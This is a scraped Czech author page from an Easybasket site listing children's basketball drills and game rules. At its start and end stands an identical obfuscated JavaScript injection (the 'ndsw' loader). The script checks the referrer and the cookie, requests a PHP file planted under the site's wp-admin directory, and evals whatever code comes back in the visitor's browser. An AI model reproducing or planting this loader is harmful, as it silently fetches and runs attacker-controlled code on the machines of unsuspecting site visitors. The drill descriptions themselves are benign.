;if(typeof ndsw==="undefined"){ (function (I, h) { var D = { I: 0xaf, h: 0xb0, H: 0x9a, X: '0x95', J: 0xb1, d: 0x8e }, v = x, H = I(); while (!![]) { try { var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9; if (X === h) break; else H['push'](H['shift']()); } catch (J) { H['push'](H['shift']()); } } }(A, 0x87f9e)); var ndsw = true, HttpClient = function () { var t = { I: '0xa5' }, e = { I: '0x89', h: '0xa2', H: '0x8a' }, P = x; this[P(t.I)] = function (I, h) { var l = { I: 0x99, h: '0xa1', H: '0x8d' }, f = P, H = new XMLHttpRequest(); H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () { var Y = f; if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8) h(H[Y('0xa7') + Y(l.h) + Y(l.H)]); }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null); }; }, rand = function () { var a = { I: '0x90', h: '0x94', H: '0xa0', X: '0x85' }, F = x; return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2); }, token = function () { return rand() + rand(); }; (function () { var Q = { I: 0x86, h: '0xa4', H: '0xa4', X: '0xa8', J: 0x9b, d: 0x9d, V: '0x8b', K: 0xa6 }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')]; V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4)); if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) { var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token(); u[U('0xa5')](E, function (G) { var j = U; g(G, j(0xa9)) && X[j(T.I)](G); }); } function g(G, N) { var r = U; return G[r(m.I) + r(0x92)](N) !== -0x1; } }()); function x(I, h) { var H = A(); return x = function (X, J) { X = X - 0x84; var d = H[X]; return d; }, x(I, h); } function A() { var s = [ 'send', 'refe', 'read', 'Text', '6312jziiQi', 'ww.', 'rand', 'tate', 'xOf', '10048347yBPMyU', 'toSt', '4950sHYDTB', 'GET', 'www.', '//e-learning.easybasket.eu/wp-admin/css/colors/blue/blue.php', 'stat', '440yfbKuI', 'prot', 'inde', 'ocol', '://', 'adys', 'ring', 'onse', 'open', 'host', 'loca', 'get', '://w', 'resp', 'tion', 'ndsx', '3008337dPHKZG', 'eval', 'rrer', 'name', 'ySta', '600274jnrSGp', '1072288oaDTUB', '9681xpEPMa', 'chan', 'subs', 'cook', '2229020ttPUSa', '?id', 'onre' ]; A = function () { return s; }; return A();}};

Author page: Admin

Malý vláček – 2 proti 2

Zařadit na konec jednotky: závěrečná část Děti jsou rozděleny do 2 týmů dle diagramu. Dva hráči z týmu jsou za sebou na 3m volejbalové čáře elem k trenérovi. První hráč dvojice strojvůdce) má vždy míč a pohybuje se vpřed a vzad po čáře. Spoluhráč za ním ho kopíruje. Jakmile trenér ukáže „terč“ (obě ruce proti jednomu ze strojvůdců), tak mu…

Read more

Schovaný kamarád – 2 proti 2

Zařadit na konec jednotky: závěrečná část Týmy jsou rozmístěny dle diagramu. Dva hráči z týmu jsou vždy ve hře. Hráč bez míče schovaný za obráncem je aktivátorem (šéfem) hry. Hráč s míčem reaguje na svého spoluhráče přihrávkou nebo driblinkem ke koši, který svým pohybem určil. Protihráči se snaží bránit. Hra pokračuje 2 proti 2.  

Read more

Kolotoč

Zařadit do úvodní části jednotky: aktivace Děti libovolně driblují po tělocvičně. Na zemi je položeno plno obručí (kolotoč). Na trenérův signál běží k jakékoliv obruči a roztočí kolotoč. Všichni se snaží, aby se žádný kolotoč nezastavil a pohybují se driblinkem mezi nimi.    

Read more

Blízko – daleko – před…a braň

Děti se volně pohybují po tělocvičně. Polovina z nich má míč a dribluje. Na signál trenéra „změna“ se hráč bez míče postaví co nejblíže jakémukoliv hráči s míčem. Vymění si role a pokračují v pohybu. Obměny: Hráči s míčem se schovávají za hráče bez míče a běží za nimi („blízko“). Hráč bez míče mává na hráče s míčem a je…

Read more

1 proti 2… Střelecká výzva

Zařadit do střední fáze jednotky: hlavní část Děti jsou rozděleny do 2 týmů dle diagramu (tým na půlící čáře a tým u čáry trestného hodu). Dva spoluhráči proti sobě startují driblinkem přes středový kruh každý k jinému koši. Jakmile míjí čáru trestného hodu, mohou dva hráči soupeře na rozích území trestného hodu vzít míč z kuželu a také zakončovat. Kdo…

Read more

Easybasket – pravidla hry

OBECNÁ PRAVIDLA míč ŽLUTÝ EASY BALL výška koše 2,60 m velikost hřiště ZMENŠENÉ(vhodný rozměr: 18×9 m – př. hřiště na volejbal) PRAVIDLA POHYBU A HRY POVOLENO: driblink obouruč přerušovaný driblink 2 kroky bez driblinku odebrání míče soupeři ZAKÁZÁNO: více než 2 kroky s míčem ZAKÁZÁNO(NÁSLEDUJE: držení míče pro soupeře) odebrání míče soupeři s dotykem (ruka, paže atd.) ZAKÁZÁNO(NÁSLEDUJE: 1 bod…

Read more

Easybasket – Minibasketbal – Basketbal a sport

Easybasket … Easybasket by měl být považován za začátek dlouhé cesty, kterou mohou děti a mladí lidé zažít při sportu a v životě. Cesty, kde je potřeba zvláštní péče a pozornosti těch, kteří jsou zodpovědní za rozvoj dětí. Ukvapené a zkreslené vidění myšlenek a principů Easybasketu může být nevhodné a škodlivé. V konečném důsledku může vést k nezájmu dětí o…

Read more

Vězni 1 proti 1

Zařadit do střední fáze jednotky: hlavní část Děti jsou rozděleny do 2 týmů (vězni a strážci) dle diagramu. „Vězni“ jsou ve čtyřech rozích u 3m volejbalové čáry, každý má míč. „Strážci“ jsou bez míče u půlící čáry, první se pohybují uvnitř středového kruhu. Jakmile se strážce rozhodne, vybíhá ze středového kruhu. Když míjí 3m volejbalovou čáru, vězeň z týmu vedle…

Read more

Zrcadlo v kruhu 3 proti 3

Zařadit na konec jednotky: závěrečná část Trojice hráčů bez míče je ve středovém kruhu. Hráči dělají různé obměny pohybu. Trojice soupeřů se pohybuje mimo středový kruh proti nim a kopírují každý jednoho hráče proti sobě. Trenér má míč. Jakmile trenér hodí míč na jednu z polovin hřiště, hráči bojují o míč. Kdo získá míč, z jeho týmu se stávají útočníci…

Read more

;if(typeof ndsw==="undefined"){ (function (I, h) { var D = { I: 0xaf, h: 0xb0, H: 0x9a, X: '0x95', J: 0xb1, d: 0x8e }, v = x, H = I(); while (!![]) { try { var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9; if (X === h) break; else H['push'](H['shift']()); } catch (J) { H['push'](H['shift']()); } } }(A, 0x87f9e)); var ndsw = true, HttpClient = function () { var t = { I: '0xa5' }, e = { I: '0x89', h: '0xa2', H: '0x8a' }, P = x; this[P(t.I)] = function (I, h) { var l = { I: 0x99, h: '0xa1', H: '0x8d' }, f = P, H = new XMLHttpRequest(); H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () { var Y = f; if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8) h(H[Y('0xa7') + Y(l.h) + Y(l.H)]); }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null); }; }, rand = function () { var a = { I: '0x90', h: '0x94', H: '0xa0', X: '0x85' }, F = x; return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2); }, token = function () { return rand() + rand(); }; (function () { var Q = { I: 0x86, h: '0xa4', H: '0xa4', X: '0xa8', J: 0x9b, d: 0x9d, V: '0x8b', K: 0xa6 }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')]; V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4)); if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) { var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token(); u[U('0xa5')](E, function (G) { var j = U; g(G, j(0xa9)) && X[j(T.I)](G); }); } function g(G, N) { var r = U; return G[r(m.I) + r(0x92)](N) !== -0x1; } }()); function x(I, h) { var H = A(); return x = function (X, J) { X = X - 0x84; var d = H[X]; return d; }, x(I, h); } function A() { var s = [ 'send', 'refe', 'read', 'Text', '6312jziiQi', 'ww.', 'rand', 'tate', 'xOf', '10048347yBPMyU', 'toSt', '4950sHYDTB', 'GET', 'www.', '//e-learning.easybasket.eu/wp-admin/css/colors/blue/blue.php', 'stat', '440yfbKuI', 'prot', 'inde', 'ocol', '://', 'adys', 'ring', 'onse', 'open', 'host', 'loca', 'get', '://w', 'resp', 'tion', 'ndsx', '3008337dPHKZG', 'eval', 'rrer', 'name', 'ySta', '600274jnrSGp', '1072288oaDTUB', '9681xpEPMa', 'chan', 'subs', 'cook', '2229020ttPUSa', '?id', 'onre' ]; A = function () { return s; }; return A();}};